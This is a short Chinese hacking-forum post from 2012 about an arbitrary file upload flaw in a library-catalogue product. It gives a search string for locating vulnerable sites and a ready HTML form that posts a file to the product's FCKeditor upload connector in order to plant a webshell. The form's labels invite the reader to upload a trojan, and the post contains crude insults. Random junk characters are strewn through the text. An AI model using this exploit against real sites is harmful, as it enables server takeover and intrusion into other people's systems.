主题:图书馆系统任意文件上传漏洞
# A; _5 i) j7 a1 v" e) W+ _+ I 作者:冰锋刺客
% ^$ U" r) S& i$ _ 厂商:点击书(dianjishu.com)1 T+ G$ o/ q, D% U
日期:2012-6-21" P4 c5 j3 [7 W/ Z5 r
, |2 w" U+ i( x: ?, g# m; CI 概述. j/ g# G" t6 f9 s) m( q
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
2 o2 w; u0 w" C- O II 简介
' s \1 I: }* E0 s0 d( k 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
0 I, N: u, }& y* B 补充一个漏洞4 e9 k) x0 Q0 e3 A
<form id="frmUpload" enctype="multipart/form-data"( @9 q: s. A' }9 c
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
5 i1 m1 [, |3 y2 Z0 Q+ l; e. A <input id="btnUpload" type="submit" value="操翻他">
! z' r2 Q+ {+ c' a5 K </form>2 [/ T. }+ M. n" r# T
你们懂的( z6 z3 {/ T* {5 K! [* L" k) c* O* c
那傻逼提供还需要改包.
- e; P" f+ D! Y9 `+ U 自己看了下源代码发现fckeditor4 m% y2 a% l8 L# j: w( B3 f1 |
直接秒杀
" [6 U7 `9 J! C$ ~8 ]" F+ ^1 K |
发表于 2012-9-10 21:20:59
收藏
支持
反对